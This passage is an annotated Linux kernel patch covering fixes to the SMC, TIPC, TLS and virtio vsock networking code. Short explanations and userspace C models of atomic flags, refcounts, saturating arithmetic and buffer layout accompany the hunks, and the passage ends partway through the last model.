+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index 4ea41d6e36969..d676119984c09 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -274,7 +274,7 @@ static int __smc_release(struct smc_sock *smc)
+ 
+ 	if (!smc->use_fallback) {
+ 		rc = smc_close_active(smc);
+-		sock_set_flag(sk, SOCK_DEAD);
++		smc_sock_set_flag(sk, SOCK_DEAD);
+ 		sk->sk_shutdown |= SHUTDOWN_MASK;
+ 	} else {
+ 		if (sk->sk_state != SMC_CLOSED) {
+@@ -1710,7 +1710,7 @@ static int smc_clcsock_accept(struct smc_sock *lsmc, struct smc_sock **new_smc)
+ 		if (new_clcsock)
+ 			sock_release(new_clcsock);
+ 		new_sk->sk_state = SMC_CLOSED;
+-		sock_set_flag(new_sk, SOCK_DEAD);
++		smc_sock_set_flag(new_sk, SOCK_DEAD);
+ 		sock_put(new_sk); /* final */
+ 		*new_smc = NULL;
+ 		goto out;
+diff --git a/net/smc/smc.h b/net/smc/smc.h
+index 1d36720fc019c..bcb57e60b2155 100644
+--- a/net/smc/smc.h
++++ b/net/smc/smc.h
+@@ -377,4 +377,9 @@ int smc_nl_dump_hs_limitation(struct sk_buff *skb, struct netlink_callback *cb);
+ int smc_nl_enable_hs_limitation(struct sk_buff *skb, struct genl_info *info);
+ int smc_nl_disable_hs_limitation(struct sk_buff *skb, struct genl_info *info);
+ 
++static inline void smc_sock_set_flag(struct sock *sk, enum sock_flags flag)
++{
++	set_bit(flag, &sk->sk_flags);
++}
++
+ #endif	/* __SMC_H */
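
smc_sock_set_flag() is what the af_smc.c, smc_cdc.c and smc_close.c hunks switch to: it sets the flag with the atomic set_bit(), whereas the generic sock_set_flag() uses a non-atomic bit operation, presumably because SMC can mark a socket SOCK_DEAD or SOCK_DONE while other contexts update sk_flags concurrently. The difference, sketched with compiler builtins in userspace:

#include <stdio.h>

static unsigned long sk_flags;

/* Non-atomic set: a plain read-modify-write, like __set_bit(). */
static void set_flag_nonatomic(int bit)
{
	sk_flags |= 1UL << bit;
}

/* Atomic set, like set_bit(): safe against concurrent updates. */
static void set_flag_atomic(int bit)
{
	__atomic_fetch_or(&sk_flags, 1UL << bit, __ATOMIC_RELAXED);
}

int main(void)
{
	set_flag_nonatomic(0);
	set_flag_atomic(4);
	printf("flags=%#lx\n", sk_flags);	/* 0x11 */
	return 0;
}
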
+diff --git a/net/smc/smc_cdc.c b/net/smc/smc_cdc.c
+index 89105e95b4523..3c06625ceb200 100644
+--- a/net/smc/smc_cdc.c
++++ b/net/smc/smc_cdc.c
+@@ -28,13 +28,15 @@ static void smc_cdc_tx_handler(struct smc_wr_tx_pend_priv *pnd_snd,
+ {
+ 	struct smc_cdc_tx_pend *cdcpend = (struct smc_cdc_tx_pend *)pnd_snd;
+ 	struct smc_connection *conn = cdcpend->conn;
++	struct smc_buf_desc *sndbuf_desc;
+ 	struct smc_sock *smc;
+ 	int diff;
+ 
++	sndbuf_desc = conn->sndbuf_desc;
+ 	smc = container_of(conn, struct smc_sock, conn);
+ 	bh_lock_sock(&smc->sk);
+-	if (!wc_status) {
+-		diff = smc_curs_diff(cdcpend->conn->sndbuf_desc->len,
++	if (!wc_status && sndbuf_desc) {
++		diff = smc_curs_diff(sndbuf_desc->len,
+ 				     &cdcpend->conn->tx_curs_fin,
+ 				     &cdcpend->cursor);
+ 		/* sndbuf_space is decreased in smc_sendmsg */
+@@ -114,9 +116,6 @@ int smc_cdc_msg_send(struct smc_connection *conn,
+ 	union smc_host_cursor cfed;
+ 	int rc;
+ 
+-	if (unlikely(!READ_ONCE(conn->sndbuf_desc)))
+-		return -ENOBUFS;
+-
+ 	smc_cdc_add_pending_send(conn, pend);
+ 
+ 	conn->tx_cdc_seq++;
+@@ -385,7 +384,7 @@ static void smc_cdc_msg_recv_action(struct smc_sock *smc,
+ 		smc->sk.sk_shutdown |= RCV_SHUTDOWN;
+ 		if (smc->clcsock && smc->clcsock->sk)
+ 			smc->clcsock->sk->sk_shutdown |= RCV_SHUTDOWN;
+-		sock_set_flag(&smc->sk, SOCK_DONE);
++		smc_sock_set_flag(&smc->sk, SOCK_DONE);
+ 		sock_hold(&smc->sk); /* sock_put in close_work */
+ 		if (!queue_work(smc_close_wq, &conn->close_work))
+ 			sock_put(&smc->sk);
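
Two related fixes here: the tx completion handler snapshots conn->sndbuf_desc into a local and tolerates it being NULL, and smc_cdc_msg_send() drops its early -ENOBUFS return so a CDC message can still be sent after the send buffer is gone. The snapshot-then-check pattern in isolation:

#include <stddef.h>
#include <stdio.h>

struct buf { int len; };

/* Completion path: take one snapshot of a buffer pointer that a
 * concurrent teardown may clear, then only use the snapshot. */
static int finish_send(struct buf **slot, int ok)
{
	struct buf *b = *slot;	/* single read of the shared pointer */

	if (ok && b)
		return b->len;
	return 0;
}

int main(void)
{
	struct buf b = { 128 };
	struct buf *slot = &b;

	printf("%d\n", finish_send(&slot, 1));	/* 128 */
	slot = NULL;				/* buffer torn down */
	printf("%d\n", finish_send(&slot, 1));	/* 0 */
	return 0;
}
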
+diff --git a/net/smc/smc_close.c b/net/smc/smc_close.c
+index dbdf03e8aa5b5..10219f55aad14 100644
+--- a/net/smc/smc_close.c
++++ b/net/smc/smc_close.c
+@@ -116,7 +116,8 @@ static void smc_close_cancel_work(struct smc_sock *smc)
+ 	struct sock *sk = &smc->sk;
+ 
+ 	release_sock(sk);
+-	cancel_work_sync(&smc->conn.close_work);
++	if (cancel_work_sync(&smc->conn.close_work))
++		sock_put(sk);
+ 	cancel_delayed_work_sync(&smc->conn.tx_work);
+ 	lock_sock(sk);
+ }
+@@ -173,7 +174,7 @@ void smc_close_active_abort(struct smc_sock *smc)
+ 		break;
+ 	}
+ 
+-	sock_set_flag(sk, SOCK_DEAD);
++	smc_sock_set_flag(sk, SOCK_DEAD);
+ 	sk->sk_state_change(sk);
+ 
+ 	if (release_clcsock) {
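
Work queued for the close handler owns a sock reference (note the sock_hold() with the "sock_put in close_work" comment in the smc_cdc.c hunk). When cancel_work_sync() returns true, the pending work will never run, so the reference it owned must be dropped by the canceller. The ownership rule as a counter sketch:

#include <stdbool.h>
#include <stdio.h>

static int refcnt;
static bool work_pending_flag;

static void hold(void) { refcnt++; }
static void put(void)  { refcnt--; }

static void queue_close_work(void)
{
	hold();			/* reference owned by the queued work */
	work_pending_flag = true;
}

/* Returns true if the work was still pending (now canceled). */
static bool cancel_work_sync_sim(void)
{
	bool was_pending = work_pending_flag;

	work_pending_flag = false;
	return was_pending;
}

int main(void)
{
	queue_close_work();
	if (cancel_work_sync_sim())
		put();		/* canceled work never runs its put() */
	printf("refcnt=%d\n", refcnt);	/* 0: balanced */
	return 0;
}
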
+diff --git a/net/tipc/link.c b/net/tipc/link.c
+index 2eff1c7949cbc..8715c9b05f90d 100644
+--- a/net/tipc/link.c
++++ b/net/tipc/link.c
+@@ -1446,7 +1446,7 @@ u16 tipc_get_gap_ack_blks(struct tipc_gap_ack_blks **ga, struct tipc_link *l,
+ 		p = (struct tipc_gap_ack_blks *)msg_data(hdr);
+ 		sz = ntohs(p->len);
+ 		/* Sanity check */
+-		if (sz == struct_size(p, gacks, p->ugack_cnt + p->bgack_cnt)) {
++		if (sz == struct_size(p, gacks, size_add(p->ugack_cnt, p->bgack_cnt))) {
+ 			/* Good, check if the desired type exists */
+ 			if ((uc && p->ugack_cnt) || (!uc && p->bgack_cnt))
+ 				goto ok;
+@@ -1533,7 +1533,7 @@ static u16 tipc_build_gap_ack_blks(struct tipc_link *l, struct tipc_msg *hdr)
+ 			__tipc_build_gap_ack_blks(ga, l, ga->bgack_cnt) : 0;
+ 
+ 	/* Total len */
+-	len = struct_size(ga, gacks, ga->bgack_cnt + ga->ugack_cnt);
++	len = struct_size(ga, gacks, size_add(ga->bgack_cnt, ga->ugack_cnt));
+ 	ga->len = htons(len);
+ 	return len;
+ }
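
struct_size() saturates to SIZE_MAX on overflow, but only if the arithmetic it is given has not already wrapped; an open-coded '+' in the element count is evaluated first in ordinary integer math. size_add() keeps the whole computation in saturating size_t arithmetic. A userspace model of that helper:

#include <stdint.h>
#include <stdio.h>

#define SIZE_SAT SIZE_MAX	/* saturation sentinel, as in the kernel */

/* Saturating size_t addition, modeled on the kernel's size_add(). */
static size_t size_add_sat(size_t a, size_t b)
{
	size_t sum = a + b;

	return sum < a ? SIZE_SAT : sum;
}

int main(void)
{
	printf("%zu\n", size_add_sat(3, 4));			/* 7 */
	printf("%d\n", size_add_sat(SIZE_MAX, 2) == SIZE_SAT);	/* 1 */
	return 0;
}
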
+diff --git a/net/tipc/netlink.c b/net/tipc/netlink.c
+index e8fd257c0e688..1a9a5bdaccf4f 100644
+--- a/net/tipc/netlink.c
++++ b/net/tipc/netlink.c
+@@ -88,7 +88,7 @@ const struct nla_policy tipc_nl_net_policy[TIPC_NLA_NET_MAX + 1] = {
+ 
+ const struct nla_policy tipc_nl_link_policy[TIPC_NLA_LINK_MAX + 1] = {
+ 	[TIPC_NLA_LINK_UNSPEC]		= { .type = NLA_UNSPEC },
+-	[TIPC_NLA_LINK_NAME]		= { .type = NLA_STRING,
++	[TIPC_NLA_LINK_NAME]		= { .type = NLA_NUL_STRING,
+ 					    .len = TIPC_MAX_LINK_NAME },
+ 	[TIPC_NLA_LINK_MTU]		= { .type = NLA_U32 },
+ 	[TIPC_NLA_LINK_BROADCAST]	= { .type = NLA_FLAG },
+@@ -125,7 +125,7 @@ const struct nla_policy tipc_nl_prop_policy[TIPC_NLA_PROP_MAX + 1] = {
+ 
+ const struct nla_policy tipc_nl_bearer_policy[TIPC_NLA_BEARER_MAX + 1]	= {
+ 	[TIPC_NLA_BEARER_UNSPEC]	= { .type = NLA_UNSPEC },
+-	[TIPC_NLA_BEARER_NAME]		= { .type = NLA_STRING,
++	[TIPC_NLA_BEARER_NAME]		= { .type = NLA_NUL_STRING,
+ 					    .len = TIPC_MAX_BEARER_NAME },
+ 	[TIPC_NLA_BEARER_PROP]		= { .type = NLA_NESTED },
+ 	[TIPC_NLA_BEARER_DOMAIN]	= { .type = NLA_U32 }
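
NLA_STRING with a .len bound only limits the attribute's length; NLA_NUL_STRING additionally requires a terminating NUL inside the payload, so link and bearer names can safely be handed to C string functions. The check it enforces amounts to:

#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Accept only if a NUL appears within the attribute payload,
 * which is what an NLA_NUL_STRING policy guarantees. */
static bool nul_string_ok(const char *data, size_t len)
{
	return memchr(data, '\0', len) != NULL;
}

int main(void)
{
	char good[8] = "eth0";			/* zero-padded */
	char bad[4]  = { 'e', 't', 'h', '0' };	/* no terminator */

	printf("%d %d\n", nul_string_ok(good, sizeof(good)),
	       nul_string_ok(bad, sizeof(bad)));	/* 1 0 */
	return 0;
}
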
+diff --git a/net/tls/tls.h b/net/tls/tls.h
+index 17737a65c643a..0672acab27731 100644
+--- a/net/tls/tls.h
++++ b/net/tls/tls.h
+@@ -70,6 +70,8 @@ struct tls_rec {
+ 	char content_type;
+ 	struct scatterlist sg_content_type;
+ 
++	struct sock *sk;
++
+ 	char aad_space[TLS_AAD_SPACE_SIZE];
+ 	u8 iv_data[MAX_IV_SIZE];
+ 	struct aead_request aead_req;
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 2af72d349192e..2e60bf06adff0 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -38,6 +38,7 @@
+ #include <linux/bug.h>
+ #include <linux/sched/signal.h>
+ #include <linux/module.h>
++#include <linux/kernel.h>
+ #include <linux/splice.h>
+ #include <crypto/aead.h>
+ 
+@@ -57,6 +58,7 @@ struct tls_decrypt_arg {
+ };
+ 
+ struct tls_decrypt_ctx {
++	struct sock *sk;
+ 	u8 iv[MAX_IV_SIZE];
+ 	u8 aad[TLS_MAX_AAD_SIZE];
+ 	u8 tail;
+@@ -179,18 +181,25 @@ static int tls_padding_length(struct tls_prot_info *prot, struct sk_buff *skb,
+ 	return sub;
+ }
+ 
+-static void tls_decrypt_done(struct crypto_async_request *req, int err)
++static void tls_decrypt_done(crypto_completion_data_t *data, int err)
+ {
+-	struct aead_request *aead_req = (struct aead_request *)req;
++	struct aead_request *aead_req = crypto_get_completion_data(data);
++	struct crypto_aead *aead = crypto_aead_reqtfm(aead_req);
+ 	struct scatterlist *sgout = aead_req->dst;
+ 	struct scatterlist *sgin = aead_req->src;
+ 	struct tls_sw_context_rx *ctx;
++	struct tls_decrypt_ctx *dctx;
+ 	struct tls_context *tls_ctx;
+ 	struct scatterlist *sg;
+ 	unsigned int pages;
+ 	struct sock *sk;
++	int aead_size;
+ 
+-	sk = (struct sock *)req->data;
++	aead_size = sizeof(*aead_req) + crypto_aead_reqsize(aead);
++	aead_size = ALIGN(aead_size, __alignof__(*dctx));
++	dctx = (void *)((u8 *)aead_req + aead_size);
++
++	sk = dctx->sk;
+ 	tls_ctx = tls_get_ctx(sk);
+ 	ctx = tls_sw_ctx_rx(tls_ctx);
+ 
+@@ -242,7 +251,7 @@ static int tls_do_decryption(struct sock *sk,
+ 	if (darg->async) {
+ 		aead_request_set_callback(aead_req,
+ 					  CRYPTO_TFM_REQ_MAY_BACKLOG,
+-					  tls_decrypt_done, sk);
++					  tls_decrypt_done, aead_req);
+ 		atomic_inc(&ctx->decrypt_pending);
+ 	} else {
+ 		aead_request_set_callback(aead_req,
+@@ -338,6 +347,8 @@ static struct tls_rec *tls_get_rec(struct sock *sk)
+ 	sg_set_buf(&rec->sg_aead_out[0], rec->aad_space, prot->aad_size);
+ 	sg_unmark_end(&rec->sg_aead_out[1]);
+ 
++	rec->sk = sk;
++
+ 	return rec;
+ }
+ 
+@@ -419,22 +430,27 @@ tx_err:
+ 	return rc;
+ }
+ 
+-static void tls_encrypt_done(struct crypto_async_request *req, int err)
++static void tls_encrypt_done(crypto_completion_data_t *data, int err)
+ {
+-	struct aead_request *aead_req = (struct aead_request *)req;
+-	struct sock *sk = req->data;
+-	struct tls_context *tls_ctx = tls_get_ctx(sk);
+-	struct tls_prot_info *prot = &tls_ctx->prot_info;
+-	struct tls_sw_context_tx *ctx = tls_sw_ctx_tx(tls_ctx);
++	struct aead_request *aead_req = crypto_get_completion_data(data);
++	struct tls_sw_context_tx *ctx;
++	struct tls_context *tls_ctx;
++	struct tls_prot_info *prot;
+ 	struct scatterlist *sge;
+ 	struct sk_msg *msg_en;
+ 	struct tls_rec *rec;
+ 	bool ready = false;
++	struct sock *sk;
+ 	int pending;
+ 
+ 	rec = container_of(aead_req, struct tls_rec, aead_req);
+ 	msg_en = &rec->msg_encrypted;
+ 
++	sk = rec->sk;
++	tls_ctx = tls_get_ctx(sk);
++	prot = &tls_ctx->prot_info;
++	ctx = tls_sw_ctx_tx(tls_ctx);
++
+ 	sge = sk_msg_elem(msg_en, msg_en->sg.curr);
+ 	sge->offset -= prot->prepend_size;
+ 	sge->length += prot->prepend_size;
+@@ -522,7 +538,7 @@ static int tls_do_encryption(struct sock *sk,
+ 			       data_len, rec->iv_data);
+ 
+ 	aead_request_set_callback(aead_req, CRYPTO_TFM_REQ_MAY_BACKLOG,
+-				  tls_encrypt_done, sk);
++				  tls_encrypt_done, aead_req);
+ 
+ 	/* Add the record in tx_list */
+ 	list_add_tail((struct list_head *)&rec->list, &ctx->tx_list);
+@@ -1495,7 +1511,8 @@ static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
+ 	 * Both structs are variable length.
+ 	 */
+ 	aead_size = sizeof(*aead_req) + crypto_aead_reqsize(ctx->aead_recv);
+-	mem = kmalloc(aead_size + struct_size(dctx, sg, n_sgin + n_sgout),
++	aead_size = ALIGN(aead_size, __alignof__(*dctx));
++	mem = kmalloc(aead_size + struct_size(dctx, sg, size_add(n_sgin, n_sgout)),
+ 		      sk->sk_allocation);
+ 	if (!mem) {
+ 		err = -ENOMEM;
+@@ -1505,6 +1522,7 @@ static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
+ 	/* Segment the allocated memory */
+ 	aead_req = (struct aead_request *)mem;
+ 	dctx = (struct tls_decrypt_ctx *)(mem + aead_size);
++	dctx->sk = sk;
+ 	sgin = &dctx->sg[0];
+ 	sgout = &dctx->sg[n_sgin];
+ 
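
With the callback now receiving crypto completion data instead of an arbitrary pointer, the socket has to travel with the request itself: the tx path stores it in struct tls_rec and recovers it via container_of(), while the rx path stores it in the tls_decrypt_ctx laid out immediately after the aead_request in a single allocation. Both sides must apply the same ALIGN step when computing where the context starts; a standalone model of that layout arithmetic (sizes are invented):

#include <stdio.h>
#include <stdlib.h>

#define ALIGN_UP(x, a)	(((x) + (a) - 1) & ~((size_t)(a) - 1))

struct fake_req  { char opaque[52]; };	/* aead_request + tfm ctx, say */
struct fake_dctx { void *sk; char iv[16]; };

int main(void)
{
	/* Allocation side: request first, context after, one block. */
	size_t req_size = ALIGN_UP(sizeof(struct fake_req),
				   __alignof__(struct fake_dctx));
	char *mem = malloc(req_size + sizeof(struct fake_dctx));
	struct fake_dctx *dctx = (struct fake_dctx *)(mem + req_size);

	/* Completion side: recompute the same offset from the request. */
	struct fake_req *req = (struct fake_req *)mem;
	struct fake_dctx *again =
		(struct fake_dctx *)((char *)req + req_size);

	printf("%d\n", dctx == again);	/* 1: both sides agree */
	free(mem);
	return 0;
}

Without the shared ALIGN step, a request size that is not a multiple of the context's alignment would make the allocation and completion sides disagree about where dctx lives, and misalign it besides.
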
+diff --git a/net/vmw_vsock/virtio_transport.c b/net/vmw_vsock/virtio_transport.c
+index 460e7fbb42da3..16575ea836590 100644
+--- a/net/vmw_vsock/virtio_transport.c
++++ b/net/vmw_vsock/virtio_transport.c
+@@ -42,8 +42,7 @@ struct virtio_vsock {
+ 	bool tx_run;
+ 
+ 	struct work_struct send_pkt_work;
+-	spinlock_t send_pkt_list_lock;
+-	struct list_head send_pkt_list;
++	struct sk_buff_head send_pkt_queue;
+ 
+ 	atomic_t queued_replies;
+ 
+@@ -101,41 +100,31 @@ virtio_transport_send_pkt_work(struct work_struct *work)
+ 	vq = vsock->vqs[VSOCK_VQ_TX];
+ 
+ 	for (;;) {
+-		struct virtio_vsock_pkt *pkt;
+ 		struct scatterlist hdr, buf, *sgs[2];
+ 		int ret, in_sg = 0, out_sg = 0;
++		struct sk_buff *skb;
+ 		bool reply;
+ 
+-		spin_lock_bh(&vsock->send_pkt_list_lock);
+-		if (list_empty(&vsock->send_pkt_list)) {
+-			spin_unlock_bh(&vsock->send_pkt_list_lock);
++		skb = virtio_vsock_skb_dequeue(&vsock->send_pkt_queue);
++		if (!skb)
+ 			break;
+-		}
+-
+-		pkt = list_first_entry(&vsock->send_pkt_list,
+-				       struct virtio_vsock_pkt, list);
+-		list_del_init(&pkt->list);
+-		spin_unlock_bh(&vsock->send_pkt_list_lock);
+ 
+-		virtio_transport_deliver_tap_pkt(pkt);
++		virtio_transport_deliver_tap_pkt(skb);
++		reply = virtio_vsock_skb_reply(skb);
+ 
+-		reply = pkt->reply;
+-
+-		sg_init_one(&hdr, &pkt->hdr, sizeof(pkt->hdr));
++		sg_init_one(&hdr, virtio_vsock_hdr(skb), sizeof(*virtio_vsock_hdr(skb)));
+ 		sgs[out_sg++] = &hdr;
+-		if (pkt->buf) {
+-			sg_init_one(&buf, pkt->buf, pkt->len);
++		if (skb->len > 0) {
++			sg_init_one(&buf, skb->data, skb->len);
+ 			sgs[out_sg++] = &buf;
+ 		}
+ 
+-		ret = virtqueue_add_sgs(vq, sgs, out_sg, in_sg, pkt, GFP_KERNEL);
++		ret = virtqueue_add_sgs(vq, sgs, out_sg, in_sg, skb, GFP_KERNEL);
+ 		/* Usually this means that there is no more space available in
+ 		 * the vq
+ 		 */
+ 		if (ret < 0) {
+-			spin_lock_bh(&vsock->send_pkt_list_lock);
+-			list_add(&pkt->list, &vsock->send_pkt_list);
+-			spin_unlock_bh(&vsock->send_pkt_list_lock);
++			virtio_vsock_skb_queue_head(&vsock->send_pkt_queue, skb);
+ 			break;
+ 		}
+ 
+@@ -164,32 +153,32 @@ out:
+ }
+ 
+ static int
+-virtio_transport_send_pkt(struct virtio_vsock_pkt *pkt)
++virtio_transport_send_pkt(struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr;
+ 	struct virtio_vsock *vsock;
+-	int len = pkt->len;
++	int len = skb->len;
++
++	hdr = virtio_vsock_hdr(skb);
+ 
+ 	rcu_read_lock();
+ 	vsock = rcu_dereference(the_virtio_vsock);
+ 	if (!vsock) {
+-		virtio_transport_free_pkt(pkt);
++		kfree_skb(skb);
+ 		len = -ENODEV;
+ 		goto out_rcu;
+ 	}
+ 
+-	if (le64_to_cpu(pkt->hdr.dst_cid) == vsock->guest_cid) {
+-		virtio_transport_free_pkt(pkt);
++	if (le64_to_cpu(hdr->dst_cid) == vsock->guest_cid) {
++		kfree_skb(skb);
+ 		len = -ENODEV;
+ 		goto out_rcu;
+ 	}
+ 
+-	if (pkt->reply)
++	if (virtio_vsock_skb_reply(skb))
+ 		atomic_inc(&vsock->queued_replies);
+ 
+-	spin_lock_bh(&vsock->send_pkt_list_lock);
+-	list_add_tail(&pkt->list, &vsock->send_pkt_list);
+-	spin_unlock_bh(&vsock->send_pkt_list_lock);
+-
++	virtio_vsock_skb_queue_tail(&vsock->send_pkt_queue, skb);
+ 	queue_work(virtio_vsock_workqueue, &vsock->send_pkt_work);
+ 
+ out_rcu:
+@@ -201,9 +190,7 @@ static int
+ virtio_transport_cancel_pkt(struct vsock_sock *vsk)
+ {
+ 	struct virtio_vsock *vsock;
+-	struct virtio_vsock_pkt *pkt, *n;
+ 	int cnt = 0, ret;
+-	LIST_HEAD(freeme);
+ 
+ 	rcu_read_lock();
+ 	vsock = rcu_dereference(the_virtio_vsock);
+@@ -212,20 +199,7 @@ virtio_transport_cancel_pkt(struct vsock_sock *vsk)
+ 		goto out_rcu;
+ 	}
+ 
+-	spin_lock_bh(&vsock->send_pkt_list_lock);
+-	list_for_each_entry_safe(pkt, n, &vsock->send_pkt_list, list) {
+-		if (pkt->vsk != vsk)
+-			continue;
+-		list_move(&pkt->list, &freeme);
+-	}
+-	spin_unlock_bh(&vsock->send_pkt_list_lock);
+-
+-	list_for_each_entry_safe(pkt, n, &freeme, list) {
+-		if (pkt->reply)
+-			cnt++;
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
++	cnt = virtio_transport_purge_skbs(vsk, &vsock->send_pkt_queue);
+ 
+ 	if (cnt) {
+ 		struct virtqueue *rx_vq = vsock->vqs[VSOCK_VQ_RX];
+@@ -246,38 +220,28 @@ out_rcu:
+ 
+ static void virtio_vsock_rx_fill(struct virtio_vsock *vsock)
+ {
+-	int buf_len = VIRTIO_VSOCK_DEFAULT_RX_BUF_SIZE;
+-	struct virtio_vsock_pkt *pkt;
+-	struct scatterlist hdr, buf, *sgs[2];
++	int total_len = VIRTIO_VSOCK_DEFAULT_RX_BUF_SIZE + VIRTIO_VSOCK_SKB_HEADROOM;
++	struct scatterlist pkt, *p;
+ 	struct virtqueue *vq;
++	struct sk_buff *skb;
+ 	int ret;
+ 
+ 	vq = vsock->vqs[VSOCK_VQ_RX];
+ 
+ 	do {
+-		pkt = kzalloc(sizeof(*pkt), GFP_KERNEL);
+-		if (!pkt)
++		skb = virtio_vsock_alloc_skb(total_len, GFP_KERNEL);
++		if (!skb)
+ 			break;
+ 
+-		pkt->buf = kmalloc(buf_len, GFP_KERNEL);
+-		if (!pkt->buf) {
+-			virtio_transport_free_pkt(pkt);
++		memset(skb->head, 0, VIRTIO_VSOCK_SKB_HEADROOM);
++		sg_init_one(&pkt, virtio_vsock_hdr(skb), total_len);
++		p = &pkt;
++		ret = virtqueue_add_sgs(vq, &p, 0, 1, skb, GFP_KERNEL);
++		if (ret < 0) {
++			kfree_skb(skb);
+ 			break;
+ 		}
+ 
+-		pkt->buf_len = buf_len;
+-		pkt->len = buf_len;
+-
+-		sg_init_one(&hdr, &pkt->hdr, sizeof(pkt->hdr));
+-		sgs[0] = &hdr;
+-
+-		sg_init_one(&buf, pkt->buf, buf_len);
+-		sgs[1] = &buf;
+-		ret = virtqueue_add_sgs(vq, sgs, 0, 2, pkt, GFP_KERNEL);
+-		if (ret) {
+-			virtio_transport_free_pkt(pkt);
+-			break;
+-		}
+ 		vsock->rx_buf_nr++;
+ 	} while (vq->num_free);
+ 	if (vsock->rx_buf_nr > vsock->rx_buf_max_nr)
+@@ -299,12 +263,12 @@ static void virtio_transport_tx_work(struct work_struct *work)
+ 		goto out;
+ 
+ 	do {
+-		struct virtio_vsock_pkt *pkt;
++		struct sk_buff *skb;
+ 		unsigned int len;
+ 
+ 		virtqueue_disable_cb(vq);
+-		while ((pkt = virtqueue_get_buf(vq, &len)) != NULL) {
+-			virtio_transport_free_pkt(pkt);
++		while ((skb = virtqueue_get_buf(vq, &len)) != NULL) {
++			consume_skb(skb);
+ 			added = true;
+ 		}
+ 	} while (!virtqueue_enable_cb(vq));
+@@ -529,7 +493,7 @@ static void virtio_transport_rx_work(struct work_struct *work)
+ 	do {
+ 		virtqueue_disable_cb(vq);
+ 		for (;;) {
+-			struct virtio_vsock_pkt *pkt;
++			struct sk_buff *skb;
+ 			unsigned int len;
+ 
+ 			if (!virtio_transport_more_replies(vsock)) {
+@@ -540,23 +504,22 @@ static void virtio_transport_rx_work(struct work_struct *work)
+ 				goto out;
+ 			}
+ 
+-			pkt = virtqueue_get_buf(vq, &len);
+-			if (!pkt) {
++			skb = virtqueue_get_buf(vq, &len);
++			if (!skb)
+ 				break;
+-			}
+ 
+ 			vsock->rx_buf_nr--;
+ 
+ 			/* Drop short/long packets */
+-			if (unlikely(len < sizeof(pkt->hdr) ||
+-				     len > sizeof(pkt->hdr) + pkt->len)) {
+-				virtio_transport_free_pkt(pkt);
++			if (unlikely(len < sizeof(struct virtio_vsock_hdr) ||
++				     len > virtio_vsock_skb_len(skb))) {
++				kfree_skb(skb);
+ 				continue;
+ 			}
+ 
+-			pkt->len = len - sizeof(pkt->hdr);
+-			virtio_transport_deliver_tap_pkt(pkt);
+-			virtio_transport_recv_pkt(&virtio_transport, pkt);
++			virtio_vsock_skb_rx_put(skb);
++			virtio_transport_deliver_tap_pkt(skb);
++			virtio_transport_recv_pkt(&virtio_transport, skb);
+ 		}
+ 	} while (!virtqueue_enable_cb(vq));
+ 
+@@ -624,7 +587,7 @@ static void virtio_vsock_vqs_start(struct virtio_vsock *vsock)
+ static void virtio_vsock_vqs_del(struct virtio_vsock *vsock)
+ {
+ 	struct virtio_device *vdev = vsock->vdev;
+-	struct virtio_vsock_pkt *pkt;
++	struct sk_buff *skb;
+ 
+ 	/* Reset all connected sockets when the VQs disappear */
+ 	vsock_for_each_connected_socket(&virtio_transport.transport,
+@@ -651,23 +614,16 @@ static void virtio_vsock_vqs_del(struct virtio_vsock *vsock)
+ 	virtio_reset_device(vdev);
+ 
+ 	mutex_lock(&vsock->rx_lock);
+-	while ((pkt = virtqueue_detach_unused_buf(vsock->vqs[VSOCK_VQ_RX])))
+-		virtio_transport_free_pkt(pkt);
++	while ((skb = virtqueue_detach_unused_buf(vsock->vqs[VSOCK_VQ_RX])))
++		kfree_skb(skb);
+ 	mutex_unlock(&vsock->rx_lock);
+ 
+ 	mutex_lock(&vsock->tx_lock);
+-	while ((pkt = virtqueue_detach_unused_buf(vsock->vqs[VSOCK_VQ_TX])))
+-		virtio_transport_free_pkt(pkt);
++	while ((skb = virtqueue_detach_unused_buf(vsock->vqs[VSOCK_VQ_TX])))
++		kfree_skb(skb);
+ 	mutex_unlock(&vsock->tx_lock);
+ 
+-	spin_lock_bh(&vsock->send_pkt_list_lock);
+-	while (!list_empty(&vsock->send_pkt_list)) {
+-		pkt = list_first_entry(&vsock->send_pkt_list,
+-				       struct virtio_vsock_pkt, list);
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
+-	spin_unlock_bh(&vsock->send_pkt_list_lock);
++	virtio_vsock_skb_queue_purge(&vsock->send_pkt_queue);
+ 
+ 	/* Delete virtqueues and flush outstanding callbacks if any */
+ 	vdev->config->del_vqs(vdev);
+@@ -704,8 +660,7 @@ static int virtio_vsock_probe(struct virtio_device *vdev)
+ 	mutex_init(&vsock->tx_lock);
+ 	mutex_init(&vsock->rx_lock);
+ 	mutex_init(&vsock->event_lock);
+-	spin_lock_init(&vsock->send_pkt_list_lock);
+-	INIT_LIST_HEAD(&vsock->send_pkt_list);
++	skb_queue_head_init(&vsock->send_pkt_queue);
+ 	INIT_WORK(&vsock->rx_work, virtio_transport_rx_work);
+ 	INIT_WORK(&vsock->tx_work, virtio_transport_tx_work);
+ 	INIT_WORK(&vsock->event_work, virtio_transport_event_work);
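
This file is the heart of the 6.1.65 vsock rework: struct virtio_vsock_pkt and its hand-rolled list plus spinlock are replaced by sk_buff and sk_buff_head, whose lock comes built in, and a packet that does not fit in the virtqueue is requeued at the head for the next kick. The worker's dequeue-or-requeue shape, with a toy queue standing in for sk_buff_head (locking elided):

#include <stdio.h>

struct node { int id; struct node *next; };
struct queue { struct node *head, *tail; };

static struct node *dequeue(struct queue *q)
{
	struct node *n = q->head;

	if (n) {
		q->head = n->next;
		if (!q->head)
			q->tail = NULL;
	}
	return n;
}

static void queue_head(struct queue *q, struct node *n)
{
	n->next = q->head;
	q->head = n;
	if (!q->tail)
		q->tail = n;
}

/* Send-worker shape: stop and requeue when the "virtqueue" is full. */
static void send_work(struct queue *q, int vq_slots)
{
	struct node *n;

	while ((n = dequeue(q))) {
		if (vq_slots-- <= 0) {
			queue_head(q, n);	/* retry on next kick */
			break;
		}
		printf("sent pkt %d\n", n->id);
	}
}

int main(void)
{
	struct node c = { 3, NULL }, b = { 2, &c }, a = { 1, &b };
	struct queue q = { &a, &c };
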